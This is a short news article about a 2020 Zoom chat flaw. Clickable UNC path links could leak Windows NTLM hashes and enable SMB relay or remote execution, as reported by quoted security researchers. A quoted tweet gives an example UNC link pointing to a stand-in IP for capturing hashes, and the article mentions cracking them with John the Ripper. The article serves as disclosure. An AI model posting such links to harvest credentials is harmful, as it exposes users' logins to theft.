Zoom can leak Windows 10 network login information. Video calling software Zoom is facing a crisis in security and privacy. After we learned that they leak information to third parties, such as Facebook, and they don’t use end-to-end encryption as they market.
A security specialist with @ _g0dmode nick on Twitter realized that when the Zoom chat URL was shared in a group chat, it can also leak network credentials in the URL.
This is because Zoom not only converts the URL into a clickable link, but also adds the universal naming convention (UNC) paths that Windows uses for the network.
UNC is used to locate a network resource. With this noticeable deficit, it is possible to log in to an SMB server controlled by intruders. And when someone clicks, the credentials used to login to the network can be seen by the attacker. Because by default, Windows can send the username and the NT LAN Manager (NTLM) identity hash.
#Zoom chat allows you to post links such as \x.x.x.xxyz to attempt to capture Net-NTLM hashes if clicked by other users.
— Mitch (@_g0dmode) March 23, 2020
In addition, when an SMB connection is established with this method, the IP address, domain name, user name and client name of the connected person can also be seen.
The identity hash is an encrypted version of the credential, and it is not sent in plain text. However, weak passwords can be cracked in a few seconds with software such as John The Ripper password cracker in couple seconds with an average GPU.
Dear @zoom_us & @NCSC – well that escalated quickly…. Thanks to @AppSecBloke & @SeanWrightSec for letting me use their Zoom meeting to test. You can exploit UNC path injection to run arbitrary code, Windows does warn you with an alert box however. pic.twitter.com/aakSK1ohcL
— Hacker Fantastic (@hackerfantastic) April 1, 2020
Security specialist Matthew Hickey shown that SMB Relay attacks can be carried out with the UNC path injection problem as well. He found that this bug can also be used to execute files remotely via the UNC. In this case, however, Windows displays a warning.
According to Hickey, Zoom’s solution should be not to include UNC paths in web links. Zoom has not made a statement on the subject yet.